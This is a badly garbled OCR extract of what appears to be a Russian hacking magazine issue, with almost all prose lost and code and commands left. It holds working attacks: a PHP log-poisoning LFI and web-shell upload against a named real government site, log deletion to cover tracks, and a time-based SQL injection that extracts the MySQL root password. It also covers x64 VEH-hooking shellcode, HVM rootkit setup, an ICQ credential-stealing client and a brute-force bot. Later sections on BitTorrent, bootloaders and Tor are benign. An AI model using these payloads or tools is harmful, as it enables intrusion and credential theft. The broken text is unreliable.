[Xxx Xxx xx xx:xx:xx 2009] [error] [client xx.xx.xx.xx] client denied by server configuration: /usr/share/phpMyAdmin/ , referer: <?php eval($_REQUEST[ev]); ?>

,
.
: http://www.mon.
gov.ua/main.php?query=../../../proc/self/
fd/2%00&ev=ls+la. ,
.
wget, get, links,
lynx, . html- :
<form action="http://www.mon.gov.
ua/main.php?query=../../../proc/
self/fd/2%00&ev=copy($_FILES[file]
[tmp_name], $_GET[aa]);&aa=./
mon.php" method="post"
enctype="multipart/form-data">
<input type="file"
name="file"><br>
<input type="submit"
value=""><br>
</form>

, (

). ,
2 error.php error.
.

,
. :
<?php/*
[Mon Nov 16 11:14:07 2009] [error] [client ::1] client denied by server configuration: /usr/share/phpMyAdmin/
[Mon Nov 16 11:14:08 2009] [error] [client ::1] client denied by server configuration: /usr/share/phpMyAdmin/
[Mon Nov 16 11:14:14 2009] [error] [client ::1] client denied by server configuration: /usr/share/phpMyAdmin/
[Mon Nov 16 11:14:15 2009] [error] [client ::1] client denied by server configuration: /usr/share/phpMyAdmin/
[Mon Nov 16 11:14:18 2009] [error] [client ::1] client denied by server configuration: /usr/share/phpMyAdmin/
...
*/ ?>
<?PHP
//Authentication
$login = ""; //Login
$pass = ""; //Pass
... ?>

, -
. ,
.
, . ,

GNU, , ,
. . , ,
rm rf /var/log/httpd/. :
, .
,
( ).

,
. z


VEH

R0064 R0064@MAIL.RU

WINDOWS
X64

,
X64. , ,
. ,
.
FS . .
, .
.
SEH

32- [fs]
: gs (, TEB ring-3
gs:30h, peb gs:60h). , EXCEPTION_DIRECTORY
PE-. , , fs
, SEH
. SEH
, ...
SEH , . -
64- Windows.
( VEH). 32- Windows (
). , ,
, 32- VEH
wasm.ru/article.php?article=veh.

SEH, VEH :


( ) ntdll RtlAddVectoredExceptionHandler.
RtlAddVectoredExceptionHandler(
    ULONG FirstHandler,
    PVECTORED_EXCEPTION_HANDLER VectoredHandler )

,
SEH. ,
RtlDispatchException ntdll ?
RtlpCallVectoredHandlers, .
! , , ? , , - RtlAddVectoredExceptionHandler.
,
. ntdll RtlpCalloutEntryList ( Win Xp, Vista -
). .


( )
VECTORED_EXCEPTION_NODE64.
RtlAddVectoredExceptionHandler windows XP x64:
public RtlAddVectoredExceptionHandler
RtlAddVectoredExceptionHandler proc near
lea r8, RtlpCalloutEntryList
jmp short RtlpAddVectoredHandler
RtlAddVectoredExceptionHandler endp

PEB LIVEKD
,

CODING

VEH .
shellcode-, . , .
:
1. NTDLL.DLL.
2. RtlAddVectoredExceptionHandler, RtlEncodePointer.
3. , , .
4. .
ntdll PEB:

...
lea r8d, [rdx+20h]
mov rcx, [rcx+30h]
call RtlAllocateHeap ;
test rax, rax
mov rdi, rax ; rdi

, 18h ( !) , ,
.
VECTORED_EXCEPTION_NODE64,
:
struct _VECTORED_EXCEPTION_NODE64
{
    ULONG64 m_pNextNode;
    ULONG64 m_pPreviousNode;
    ULONG64 unknwn;
    PVOID64 m_pfnVectoredHandler;
}

, , , ( 32- VEH).
RtlpAddVectoredHandler.
NtQueryInformationProcess , RtlEncodePointer,
.
. , RtlAddVectoredExceptionHandler VECTORED_EXCEPTION_NODE64.
, , :
1.
RtlEncodePointer ( );
2. RtlEncodePointer-
18h VECTORED_EXCEPTION_NODE64. , ,
, .

....
mov rcx,gs:[60h] ; Peb x64
mov rcx,[rcx+18h] ; PEB_LDR_DATA
mov rcx,[rcx+10h] ; PEB_LDR_DATA.InLoadOrderModuleList
mov rcx,[rcx]
mov rbx,[rcx+30h] ; ntdll.dll base
....

ntdll. , . , ,
:
....
hash_str:
push rdx
push rsi
sub rax,rax
mov rsi,rdx
sub rdx,rdx
nxt:
cld
lodsb
cmp al,ah
je dn
add dx, ax
rol rdx,14
jmp nxt
dn:
mov rax,rdx
pop rsi
pop rdx
ret
....

rdx
, , -


UNINFORMED
WINDOWS
X64
(hndlr01).
(hndlr02).
rdmsr ( - ),
hndlr01 ( ),
hndlr02. , :
...
mov rbx,rsp
sub rsp,4*8
mov rdx, offset hndlr01
mov rcx, 1 ; first_handler
call qword ptr [rbx] ; RtlAddVectoredExceptionHandler
add rsp,4*8 ;
push rax ; VECTORED_EXCEPTION_NODE64
sub rsp,4*8
mov rcx,offset hndlr02
call qword ptr [rbx+8] ; RtlEncodePointer
add rsp,4*8
pop rdi ; rdi -> PVECTORED_EXCEPTION_NODE64
; hndlr02
mov [rdi+18h],rax
;
; cpl = 3 => exception
rdmsr
...

, ?
RtlAddVectoredExceptionHandler ,
!
VECTORED_EXCEPTION_NODE64.
, fs (, ).
, RtlAddVectoredExceptionHandler.


VEH-

, ,
VEH, . , ( !),
RtlDispatchException. , , RtlRaiseException,
RtlDispatchException.
int __fastcall RtlRaiseException(struct _EXCEPTION_RECORD *ExceptionRecord, int, int, __int64, __int64, __int64)


FDBG
....
call RtlVirtualUnwind
mov r11, [rsp+538h+ContextRecord._Rip]
mov [rbx+10h], r11
mov rax, gs:30h
mov rcx, [rax+60h]
cmp byte ptr [rcx+2], 0
jnz loc_77F528CB
lea rdx, [rsp+538h+ContextRecord]
mov rcx, rbx
call RtlDispatchException
....

, RtlDispatchException
call RtlpCallVectoredHandlers:
...
RtlDispatchException proc near
mov [rsp+arg_8], rdx
mov rax, rsp
sub rsp, 6A8h
mov [rax+18h], rbx
mov [rax+20h], rbp
mov [rax-8], rsi
mov [rax-10h], rdi
mov [rax-18h], r12
mov [rax-20h], r13
mov [rax-28h], r14
lea r8, RtlpCalloutEntryList
mov rbx, rdx
mov [rax-30h], r15
mov rsi, rcx
mov [rsp+6A8h+var_668], 0
call RtlpCallVectoredHandlers
...


RtlpCallVectoredHandlers.
WinXP:
...
loc_77F251F5: ; CODE XREF: RtlpCallVectoredHandlers+3F2BE
mov rbx, [rsi+18h]
mov r9d, 4
lea r8, [rsp+88h+var_58]
lea edx, [r9+20h]
mov rcx, 0FFFFFFFFFFFFFFFFh
mov [rsp+88h+var_68], r12
call NtQueryInformationProcess
mov r11d, [rsp+88h+var_58]
lea rcx, [rsp+88h+var_48]
xor r11, rbx ; <-
call r11 ; <-
lock btr cs:dword_77FA58C8, 0
...

WASM.RU VEH

Vista:
...
loc_78E9393F: ; CODE XREF: RtlpCallVectoredHandlers-16030
add dword ptr [r12+10h], 1
lea rbx, [r12+10h]
mov rcx, rdi
mov [rsp+68h+arg_18], r12
call RtlReleaseSRWLockExclusive
mov rcx, [r12+18h]
call RtlDecodePointer ; <-
lea rcx, [rsp+68h+var_48]
call rax ; <-
...

, , , , .


NtQueryInformationProcess/RtlDecodePointer. ,
call-. ,
. , ,
.
, Vista
VEH- PEB. ?
RtlpCallVectoredHandlers :
...
mov rax, gs:30h ; TEB
mov r15, [rax+60h] ; PEB
mov eax, [r15+50h] ; ProcessUsingVEH
bt eax, r8d ;
jb call_vectored_handlers
...

,
PEB !

64- Windows, SEH, VEH.


. , , ,
.
( )
. ,
. z



r0064 r0064@mail.ru

2.
AMD-V.
.

,
. .

Long Mode ,
( ),
Long Mode , 64-
-.

VMRUN


( ? :))
VMRUN .
,
VM_HSAVE_PA.
VMCB (
rax).
,


...

VMCB?

VMRUN
(
). - -


,
VMEXIT_INVALID (,
VMEXIT
).
, VMRUN ?
,

VMCB.
, VMCB:
http://opensolaris.org/sc/src/xengate/xvm-3.4+xen.hg/xen/include/asm-x86/hvm/svm/vmcb.h

1. SVME EFER 0.

.
2. CR0.CD CR0.NW. Cache Disable ,
. ( , AMD)
. , VMRUN
CD.
3. 32 CR0 0.

CR0 ( long
mode), ,
0 ( ).
4. CR3, CR4, DR6, DR7, EFER
, MBZ (Must
Be Zero).
5. ASID 0. ASID
,

(TLB).
ASID
.
, TLB
. ASID-
TLB
. , , .
6. .
,
.
// eventinj_t VMCB


VMCB VMRUN 10h



VMRUN :
...
// VMRUN_INTERCEPT 0
pVmcb->general2_intercepts|=1;
...

typedef union
{
    u64 bytes;
    struct
    {
        u64 vector: 8; //
        u64 type: 3; //
        u64 ev: 1; // , ( errorcode).
        u64 resvd1: 19; //
        u64 v: 1; // Valid. , ,
        u64 errorcode:32; //
    } fields;
} __attribute__ ((packed)) eventinj_t;

, ( type) 4:
0 INTR ( );
2 NMI ( ).
NMI, (vector) ;
3 ;
4 .
ev (Error code valid) ,
errorcode
.
? , 64- ,
#BR (
bound), .
VMEXIT_INVALID,


type (1,5,6 7).


, 2,
NMI ( , !).
7. EFER.LMA (Long Mode Active)
LME (Long Mode Enable),
Long Mode, ,
Long Mode.
,
.
8. EFER.
LME CR0.PG ( ) CR4.PAE ( CR0.PE) .
9. EFER.LME, CR0.PG, CR4.PAE (
), CS.L
CS.D . CS
. L D
. 32- D
(32
16 ), L , ,
64 . , , ,

(
,
64
32 ).
10. VMRUN (
VMCB)

. ,
. ,
VMRUN, .
, .

20 (!) .
.

, general2_intercepts
VMRUN
svm-:
VMMCALL,VMLOAD,VMSAVE,STGI,CLGI
SKINIT,
.
11.
MSR (MSRPM) - (IOPM)
.
() ! MSR ( -)
4 .
VMRUN 12
MSRPM IOPM. , ,
.
VMCB , .
, .
,
:).
VMRUN

.
, VMRUN
( State Save
Area):
1. CS rip ,
. CS , rip
long mode (
32-,
eip).
2. rflags,rax...
3. SS ( ) rsp .
32- rsp, a esp :).
4. CR0, CR2 (

page fault), CR3, CR4 EFER .
5. IDTR, GDTR( GDT IDT),ES DS, DR7 DR6.
6. V_TPR (TPR). v_tpr
CR8 .
,
, , , -
,
- ,
.
(, 7) CR8

7() .


CR0

HTTP://WWW
links

Broken Sword
wasm.ru, : http://wasm.ru/publist.php?list=24.

( )
Long Mode

.

AMD64 (EM64T)
viva64.com/content/articles/64bit-development/?f=amd64_em64t_rus.html&lang=ru&content=64-bitdevelopment.

x8664

insidepro.com/kk/072/072r.shtml.

An Introduction to Hardware-Assisted Virtual Machine (HVM) Rootkits (
,
TSC_OFFSET)
megasecurity.org/papers/hvmrootkits.pdf.

Revision Guide for AMD NPT Family 0Fh Processors
( erratum-)
support.amd.com/us/Processor_TechDocs/33610.pdf.


CR3 LONG MODE ( 64 !)


7. V_IRQ. ,
.
8. CPL .
CPL = 0,
8086, 3.
CPL : 0 , 3, , .
VMRUN (Control Area).
TSC_OFFSET.
TSC_OFFSET
( TSC) ,
.
, rdtsc,

TSC_OFFSET.
(Erratum 140), TSC MSR
rdmsr, rdtsc TSC_OFFSET .
, Control Area
,
.
ASID ..
VMCB
segment_register ( Xen),
:
// ,
typedef union segment_attributes
{
    uint16_t bytes;
    struct
    {
        uint16_t type:4; /* 0; Bit 40-43 */
        uint16_t s: 1;   /* 4; Bit 44 */
        uint16_t dpl: 2; /* 5; Bit 45-46 */
        uint16_t p: 1;   /* 7; Bit 47 */
        uint16_t avl: 1; /* 8; Bit 52 */
        uint16_t l: 1;   /* 9; Bit 53 */
        uint16_t db: 1;  /* 10; Bit 54 */
        uint16_t g: 1;   /* 11; Bit 55 */
        uint16_t pad: 4;
    } fields;
} __attribute__ ((packed)) segment_attributes_t;

// , VMCB
struct segment_register
{
    //
    uint16_t sel;
    //
    segment_attributes_t attr;
    //
    uint32_t limit;
    //
    uint64_t base;
} __attribute__ ((packed));

VMCB . :
1. , (D, L, R).
2. TR TSS (,
).
3. LDTR (P).
- ,
VMRUN (,
). VMRUN
#VMEXIT.
VMRUN VMEXIT:

CR4

LONG MODE
//
// ( )
// paVmcb physical address vmcb
// vaVmcb virtual address vmcb
do
{
    // VMEXIT , ..
    InstallIntercepts(vaVmcb);
    // VMRUN VMCB
    _VMRUN(paVmcb);
    //
    switch(vaVmcb->exitcode)
    {
    case VMEXIT_RDTSC:
        ...
        break;
    case VMEXIT_VMRUN:
        ...
        break;
    ...
    //
    }
}while(1);



(

). .

VMCB

,
?

:).

VMCB Host Save Area
MmAllocateContiguousMemorySpecifyCache. :
NTKERNELAPI
PVOID
MmAllocateContiguousMemorySpecifyCache(
    IN SIZE_T NumberOfBytes, //
    IN PHYSICAL_ADDRESS LowestAcceptableAddress, //
    IN PHYSICAL_ADDRESS HighestAcceptableAddress, //
    IN PHYSICAL_ADDRESS BoundaryAddressMultiple OPTIONAL, //
    IN MEMORY_CACHING_TYPE CacheType
);

,
( , ).

VMCB:
..
l1.QuadPart = 0; //
l2.QuadPart = -1; //
l3.QuadPart = 0x10000; //
// VMCB 1 , => uNumberOfPages = 1
// CacheType = MmCached
PageVA = MmAllocateContiguousMemorySpecifyCache (uNumberOfPages * PAGE_SIZE, l1, l2, l3, CacheType);
if (!PageVA)
    return NULL;
//
RtlZeroMemory (PageVA, uNumberOfPages * PAGE_SIZE);
//
PagePA = MmGetPhysicalAddress (PageVA);
...


HSA, MSR IOIO.

. , ,
(
), . ,
.
-
e-mail
(
). z



Ams ax330d@gmail.com



SQL
SQL
.
, ,
SQL- ,
-
,
.
SQL, .


? ,
, . ,
. , ,

/. , ,
SQL-. -,
.
.

, - , ?
,
,
, true/false. , . .
, : , time-based SQL . !


, advanced timebased SQL-.


, ,


.
,
- .
, .

.
MySQL 5. ,
5.0.12 , ( ) SLEEP().
mysql> SELECT SLEEP(2);
+----------+
| SLEEP(2) |
+----------+
|        0 |
+----------+
1 row in set (2.00 sec)

-
.

BENCHMARK() :
1. BENCHMARK() ,
;
2. BENCHMARK() ,
;
3. SLEEP() ;
4. BENCHMARK() WAF.

SQL- ?
, ,
/, .
. ,


2
SUBSTR()
MID(),
ASCII-. ,
, SLEEP().
mysql> SELECT ORD('*');
+----------+
| ORD('*') |
+----------+
|       42 |
+----------+
1 row in set (0.00 sec)

,
. *
42 , f?

40. 42 ,
, -
0.
.
:
http://victim.com/index.php?id=1 AND 1=(SELECT SLEEP((ORD(MID(password,N,1))-40)) FROM 'mysql'.'user' WHERE `user`='root' LIMIT 1) --

?
:
1. N- ;
2. ORD() ASCII-;
3.
SLEEP().

, , . , , ,

. ,
-.
Perl-,

POC-

.
- , (
). : , ,
, , ,
Proof Of Concept.

-p (
precision, -, ).
, .

, ,

root ( ),
. ( , ), ,
.



,
:
,
, .
,
2, -


5 ( ).
ASCII-
50, 2.
, ,
, .
6.5 ,
ASCII- 52, 4.
, - ,

.
,
, ,
, precision. , -p.


,
.
, ,
.
, , .
, .
6.5 ,


APACHE
. ,
precision, ,
2 11-13
(). ,
11 ,
13,5 ,
.
,
. , 0,
41 (
) 400
,

318 .
, ,
? , ,

. ,

.


( SQL-) , , .
,
.
, ,

. , ,
,
, ,
0-9, A-Z. *.
-

BENCHMARK() GREENSQL'


. , , ,
MySQL, .
. , ,
,
.
, ,
, .

,
?. ,
, 40
40- MySQL
-
SQL-.
,
,
.

MySQL
. , PostreSQL
SLEEP()
pg_sleep(), .
, , .
, ,
,
-
. ,

SQL-.
,
.
? z


icq 884888, http://wap-chat.ru

X-TOOLS

: QIP Fake
: WINDOWS 2000/2003/XP/VISTA/7
: JIYKA

QIP,

-
: QIP 2005 :).

: ArxScanSite
: WINDOWS 2000/2003/XP/VISTA/7
: ARXWOLF


X-Tools
(jiykasoft.3dn.ru)
ICQ- QIP.

QIP 2005 Build 8092.
:
, ( ,
, ),

.

:
: JIyka
: JIykaSoft.3dn.Ru
Email : JIyk@bk.ru
: uin;pass


.

: *.htm ,

:).
QIP\
Skins\skins.cfg:
e-mail,
;
;

.
QIP\
Skins\ICQ5\start.jpg .

, :
QIP 2005 (http://qip.ru/ru/pages/download_qip_ru)



ArxWolf webxakep.net
.
?
, ,

, ,
,

,

AntiDDoS-.
:
( 1 50
)
http https
(HTTP
200, 301, 404, 403, 401, 302)
(
)
Proxy/
Socks

( )



(
)
(
)
HTTP--

(UserAgent, Referer ..)


,


:
.htaccess
.htconfig
.htpasswd
_adm/
_install/
_mysql/
_notes/
_private/
_update.php
_voip/
_vti_bin/
~install.php
~update.php
1.php
1/
2003/
2006/
2007/
2008/
666/
about.php
about/
access
access_log
account.asp
account.html
account.php
acct_login/
add/
addnews/
adm/
adm2/
admin.asp
admin.cfg
admin.dat
admin.html
admin.inc
admin.php

: Storm 2008 Brutal


Edition
: WINDOWS 2000/2003/XP/VISTA/7
: Q1P
Storm 2008 Brutal Edition icq-,
, ICQ- .

. -


syntax: /autosave value


/show show .Brutal and bot windows
/hide hide .Brutal and bot windows
/runbrt run and start .Brutal
/killbrt hard terminate brute
process
/good show good list

Storm 2008 Brutal Edition


.Brutal 0.3-0.8+ (
IPD-, ,
).
:
.Brutal (,
, cleanup,
, );
windows
;
good' icq-()
;
;

(
,
,
);
;
;

;
:
, icq gate (
), , ..
:
1. Brutal control.
/stats (or 1) show .Brutal
statistics
/start press 'start' button in
.Brutal
/stop press 'stop' button in
.Brutal
/pause press 'pause' button in
.Brutal
/continue press 'continue' button
in .Brutal
/cleanup clean proxies in .Brutal
syntax: /cleanup [proxy_type]
proxy types: https (h), socks4 (s4),
socks5 (s5)
note: without parameter = cleanup
all proxies
/brtopt display .Brutal options
/threads set threads count
syntax: /threads value
/timeout set timeout option
syntax: /timeout value1 value2
note: value2 used only with .Brutal
0.5
/clntime set cleanup time
syntax: /clntime value
/autosave set autosave time

2. Bot administration.
/adminlist show admin list with
permissions
/add add UIN to admin list
syntax: /add UIN[:permissions]
ex.: '/add 123123', '/add 321321:++--'
permissions: 1 send new good's, 2
allow to use commands, 3 allow to
use /stats, 4 allow to administrate
bot, 5 notify terminating
default permissions is -+++
/delete delete UIN from admin list
syntax: /delete UIN
/pchange change permissions
syntax: /pchange UIN:perm_
index:permission , /pchange
UIN:permissions
ex.: '/pchange 123123:1:+', '/
pchange 321321:+-+-+'
/settings display bot settings
/set set bot settings
syntax: /set -option value
note: for information send '/set ?'
/botlog show bot log
syntax: /botlog [count] default
count is 10
note: large messages will not be
delivered
/messlog show messages log
syntax: /messlog [count] default
count is 10
note: large messages will not be
delivered
/pluglist show list of plugins
/clrlog clean system and messages
logs

,

,
. ,

icq (
, ).
( )
,
.

.
,
: ,
, ,
(
, rar zip) ..


uin;pass ,
, , . ,

,
,
.

.
,
,
, .

, (
)
http://qip-blog.eu.org/storm2008be.

: ORACLE SECURITY TOOLS


(GUI)
: WINDOWS 2000/2003/XP/VISTA/7
: CYBER$NAKE


MySQL MySQL?

. Oracle Security
Tools ,
Oracle 8i-9i, 10g, 11g. Oracle
Client
Oracle
.
:
Oracle;
Oracle
;
Oracle
=;
Windows 2000/
XP/2003 (
);

DOS ;

;
TNS listener.log;
;
.
securetools.ru. z



lozovsky@gameland.ru

X-

,
,
,
.

,
,
,


. ,

. ,


(, )
!


AMATEUR PHOTO:

SINtez aka

SINTEZ
( )
(,


)

:
: , -

- .

,
,
, ,
.
? , ,
: ,
, .
,
, ,
,
. ! , ? , .
z
. ,
, , -,
, -
, , ,

Mens Health ( , z . SINtez
:
-? , ,
, , . ? ,

Dr.Cod aka

:
. ,
( 1998).
:

.
-, ,
.

- -
,
. Dr.Cod

,


, , .

,
,
. ,
, .
? IRC ?
! ,
, - ,
.
?
, ? ,
:
! ,

, - .
.
2poisonS aka , ,
.
: -
. .
!

http://2funkey.ru, , :).

, FAQ ( Hack-FAQ,
!), ,

,
, . ,
,
.
(
), , .
,

,
,

:) ,
(, )
.



, 1959
. , .
:

. , ():
,
,
.
:

,
,
,
,
,

.


Holod aka

: 1999
: ? (-, , . ).

, , ,
.
, , ,
,
, . ,
.


( ),
,
, :
,

:), ,

z .

HorrifIc aka

: 1999
:

HOLOD

,
, , :
,

.
, , ,
:),
(2003-2004-) z
.
: -, -!
IT ,

HR (human resources).
.
: ,

, -,
, -, . .
,
.

,
z.
,
25.

x-crew.

HORRIFIC

,


, , ,
.
.

.
,
( 7
!)
Hack-FAQ, Horrific

z.
, , SINtez
,

, ,


,
:).
( 40000 ), z ,
,

.

, ,
,
, .
,
, z,
,
Horrific,

z 2001 :). -

, web-
,
www.cydsoft.com,
www.heapar.com www.flenov.info (
, ).


, ,

.
.
.
,
.

aka

: 1999

: ,


( ,
. ).

-,
. . ,
,
,

.
, ,
.
,
, : SINtez,

, ,
z.
, ,
.

Mindw0rk aka

: 2003
:

2004 ( .
!
!).

,
,
.
z
, , ,
,
. , ,
, ,
, , ,
,
( ,

),

, .
, ,
AI: SkyNet
.
, ,
,
,

, z
, ,
X-Crew, ,
,

SMS :
? ! ?
? ! !.

, Scut-, m00,
cDc
(!)
udaff.com.


,

( ),

,
.
.


,
,
, , XXI
,
. ,
mindw0rk.
,

( , ), MMORPG (

,
.
,
.
: . ,
. PR-
RuTube
Mediahunter.ru.
: .
, . ,
VIP-.
.
.
,
.
- *!,

.

MINDW0RK
FREEBSD. ,
!

),
,
. , , - .
: .
, ,
-.
. ,
.

, z: , , , .
,
- ,
. ,
- ,
:).


b00b1ik aka

: 2004
:
.

,
,
, ,

,
z? , ! -,

,
. -,

( , ,
, ),
(asechka.ru), ,
, (
), ,
. ,

aka CuTTer
,
( 2004 )
.
,
,
, ( 18 )
,
- 60% .
(,
, ,
, , ),
.
( , ,
CuTTer NSD),

,
, ,
PC-ZONE
, ,
(M.J.Ash)
, , ,
- . ,

DVD: Caution! Hot content! / , !


, , ,
:
z-.

. ,
z :).
,




,
2010- . ,
z- -

,
,
, ? ,
-
- .

.
,
,
, .
, ,
- .

,
: .


( ,

-). ,
- :). z


MIFRILL MIFRILL@REAL.XAKEP.RU

BITTORRENT

.
,



.
,
,
,


,

,

BITTORRENT,

.


?
, , , ,
. ,
, , ,

. ,


, .

, , ,
,

. 1975 , , , ,
,
, ,
. ,
,
. ,
,
, .
,
2 , .
,
-.
, - Stuyvesant High School.
, ,
. , ,
, ,

,
, . , ,
, , , ,
.
, , ,
,
, , ,
. ,

, , ,
.
-
,
.

,

( , ).
:

,

BITTORRENT INC.


. ,
, ,
, ,
; -
,
.
, ,

,
.

( , Basic C),
6 .
80- Stuyvesant High School
,

, , , , 10 .
1993 , ,
, .

,
,
,
,
.
,
, .
,
.
, , , ,
, .
,
,
90-,
2000- . ,

- :).


, ,
,


BITTORRENT

, , !


Python Java.
,
Evil Geniuses
for a Better Tomorrow.
,
,

MojoNation.
1999-2001
, peer-to-peer

,
;
Napster, -
KaZaa,

, - , ,
MojoNation ,
.
,

KaZaa

,
upload. ,
, , ,
700 , , 1.5 \,
1\10
. ,


. , ,
, . , ,
,
, ,
,
, ,

.
,
,
,
,
, ,
.
, , ,

, ,
, .


2001 , ,
1 2001.
Gnutella eDonkey2000, .


,
,
-
.
MojoNation :

, ,
MojoNation

, ,

,
.


mp3 ,
, -
, ,

,

.

2001
Evil Geniuses for a Better
Tomorrow
,
.

, ,

BitTorrent
,
.


2001 ,
,
1 2001.
,
BitTorrent
,
- :).
, ,
, ,
:

;
;

; ,

;
, (Give
and ye shall receive
).
,
BitTorrent-, 2002 , CodeCon,
,
.
BitTorrent
OpenSource-, ,
, ,


. ... ,
, ,

,

C BitTorrent,
-
-
-. ,


, .
, ,
,

BitTorrent .
,

.
,
:
BitTorrent

, ,

.

( , ,
),
BitTorrent . , , ,
vs. -

.
,
,
.
,
. 2003
,
Valve
(-, Half-Life),
. -
PayPal, ,
, ,
, ,
.
, , 2003
BitTorrent 20 .
. , .
,
,
.

Valve 2004-,
.


.
-
BitTorrent Inc.,
.
, BitTorrent,

( - ) BitTorrent DNA (Delivery
Network Accelerator) BitTorrent Software Development Kit.
. , 2005
BitTorrent Inc. , MPAA (
) ,
BitTorrent
,
.
,
,
,
. , ,

, -
,
BitTorrent
, ,
.
, , , ,
,
.
, -,

, -,
MPAA, RIAA
,
.
, ,
, .
, , , ,
, ,

DVD,
,
, . ,
,
,
,
,
, , ,
. - ,

,
, , . ,
,

, -,
, . , ,
;
BitTorrent , ,
5
. z


UNIXOID
HATCHET MAKS.HATCHET@YANDEX.RU

Gujin, netboot.me
boot.kernel.org
, , ,
?
, , ? ? ,
Gujin,
netboot.me boot.kernel.org.
GUJIN.
LiLo Linux ,
Grub

, Gujin (http://gujin.sourceforge.net) , .
Linux-,
(*.bdi) ISO-
.
Gujin . ,

/boot.

. ,
Linux
.
, Gujin ,


-, USB-, CD-ROM,
SD-. DOS. Gujin
ELF32
ELF64, gzip,
, FAT12, FAT16, FAT32, ext2, ext3,
ext4 ( inode) ISO 9660.

,
(,
USB- ).
,

. -, Gujin
,
,
,
CD/DVD-ROM

BIOS. -,
Gujin , : 64-
ELF- 32- 64 .
-,
Gujin :
- .
Gujin

Linux;
http://sourceforge.net/projects/gujin/files.
tar.gz-,
:
$ tar -xzf debian32.tar.gz
$ sudo dpkg -i gujin_2.7_i386.deb

/sbin
gujin,

X 01 /133/ 10

3. gujin :
$ sudo gujin --remove /dev/sda

Gujin

. ,
,
:
$ sudo gujin //gujin.ebios


gujin :
$ sudo gujin --mbr-device=/dev/sda /mnt/sdb/boot/gujin.ebios

boot.kernel.org
, /usr/share/doc/gujin/
, man-
/boot/gujin.ebios.
Gujin
, .
,
qemu :
$ sudo qemu /dev/sda


. <F1-F12>
, + - ,

, / *
,
.
, qemu -
.


. , -

,
(, VESA),
(, ISO-, CD-ROM, -,
), (!)
. ,
Gujin
. .
Gujin
:
1. :

$ sudo gujin --full /dev/fd0

-
/
initrd /boot. Gujin
, -t
.
Gujin USB-
:

$ sudo gujin /dev/sda


$ sudo gujin --mbr /dev/sdc

USB-, .
2. :
$ sudo gujin --report /dev/sda

,
.

GUJIN
--bootdir= .
--cmdline= Linux-.
-f, --full .
--mbr-device= MBR .
--quickboot= , (
, ).
--default_ide_password= IDE-.
--default_video_mode= VESA- (
, <Tab> ).
-d=, --disk=DOS|BCD|PIC|FLOPPY|IDE|BIOS|EBIOS ...
( BIOS).
-COM[1-4][,<9600>[,<n>[,<8>[,<1>]]]]], --serial=COM[1-4]... .


.ebios
,
gujin .
: bios, ebios, idechs, idelba, and idel48.
Gujin -

:

FAT12/16/32
.
,
dd:
$ sudo dd bs=512 count=64 if=/dev/zero of=/dev/sdc

BIOS USB
.
superfloppy,

( ):
$ sudo gujin --disk=BIOS:0x00,auto /dev/sdc

Gujin CD ( El-Torito).
mkiso ISO- (, )
:


UNIXOID

FreeBSD

Gujin

GUJIN
* 15 ISO- .
* ISO 127 .
* ISO ext2/ext3.
* LiveCD - , / /boot.
* Gujin LiveCD,
, .

$ gujin image.iso

512
FAT-,
.
USB-.
-t .
Gujin DOS-,
Linux DOS:
$ gujin boot.exe

GUJIN.
Gujin .
,
. ,
. , Gujin ,
MBR-, ISO-,
, USB-, -,

, ,

.
,

-.


, Linux-


,

? , ?
, netboot.me

.
: ,
( )
,
. ,
-
, :
1.
(

).
2. ( memtest86).
,
.
3. .
(

).
4.
.
BIOS,
,
,
.
netboot.me gPXE
(http://etherboot.org/wiki),

, PXE.
PXE,
, gPXE
, -, USB-

, FTP, HTTP NFS.
gPXE netboot.me
.
, netboot.me . kernel
initrd .
,
.
netboot.me
gPXE-:
USB-, - CD. ,
:
1. gPXE-.
2. :
$ sudo dd if=netbootme.dsk of=/dev/fd0   # floppy disk
$ sudo dd if=netbootme.usb of=/dev/sdf   # USB drive

3. .

,

NETBOOT.ME BKO
netboot.me boot.kernel.org
, .
. ,
( <Ctrl+B>) .


Gujin

netboot.me
Gujin

DHCP-,
.
4. /.
:
Debian Lenny (5.0).
Debian Testing.
Fedora 11.
OpenSUSE 11.1.
Ubuntu Jaunty (9.04).
Ubuntu Karmic (9.10).
FreeBSD 7.2.
MirOS bsd4me current ( Open NetBSD,
www.mirbsd.org).
LiveCD :
Tiny Core Linux 2.2.
Micro Core Linux 2.2.
MirOS bsd4me current.
:
Memtest 86 Memtest 86+.
HDT 0.3.4.
- GParted
Live 0.4.5-2 Parted Magic 4.5.
Ubuntu Jaunty (9.04) x86 rescue
Ubuntu Karmic (9.10) x86 rescue.
Smart Boot Manager.
,
nethack boot.kernel.org.
boot.kernel.org ( BKO)
netboot.me .
gPXE , :
Debian live.
Ubuntu 9.04.
Damn Small Linux.
Knoppix 5.0.1.
Fedora 11 Live CD.
: , LiveCD,
.



, netboot.me

. initrd
( ) -
, netboot.me
( ,
google ),
MY CONFIGS, new. , ,

Kernel/Image, initrd Initrd


Args.
, ,
Chainload URL , ID ,
. netboot.
me
Press any key for options or wait n seconds.
Boot a configuration directly ID
.
netboot.me, boot.kernel.org ,
. ,
. .
, git nasm:
$ sudo apt-get install build-essential git-core nasm

WARNING

warning
Gujin
,

(*.bdi) ISO- / /
boot.


,
--bootdir=/
//

.

BKO:
$ git clone git://git.etherboot.org/scm/people/pravin/BKO.git
$ cd BKO
$ git submodule init
$ git submodule update

config ,
BASE_URL URL, BKO ( gpxe), ISO_LOCATION_LOCAL URL ISO- (
BASE_URL/ISO).
gpxe
BKO:
$ make
$ cd install_help
$ ./configure_BKO.sh

initramfs ISO-:
$ ./download_initramfs_images_http.sh
$ ./download_ISO.sh

, BKO
- (, /var/www)
.z


UNIXOID
zobnin@gmail.com


, . -, , , -, , ,
, - . , ?
-
ANONYMOUSE.ORG


-,
IP-
IP- .


,
,
( , ,
,
).
IP- ,
-,

,
. ,
.
-,
, , . , , ,

FREENET

-,
, ( , ).
e-mail
,
SMTP-,
, , .
(bouncer, bnc)
IP- IRC. ,
,
-:
.

,
.


Tor,

, ,
,


.
Tor (Onion
Routing),
90- . ,

, ,

()
.
: , ,
Tor-, Tor-.
(
),
.

Tor-,

, Tor-,
.
,
Tor-.
,
Tor-
, .
.
, ,
.
, .
, ,
, ,
.
Tor,
, (
). , Tor , ,

, ,
.
,
.

Tor-,
.

.

.
Tor-, DNS-, ,
Tor-,
DNS-, , .
,
Tor Privoxy,
DNS-,
OpenDNS TorDNS.


. , , JavaScript-, . JavaScript ,
- Privoxy
Firefox- Torbutton.
Tor
.
Tor- HTTP- Privoxy,
HTTP- Tor.


UNIXOID

Torchat Python - ,

python2.5, python-wxgtk2.8 torchat.
py, .

Freenet
Ubuntu Tor- ,
. /etc/
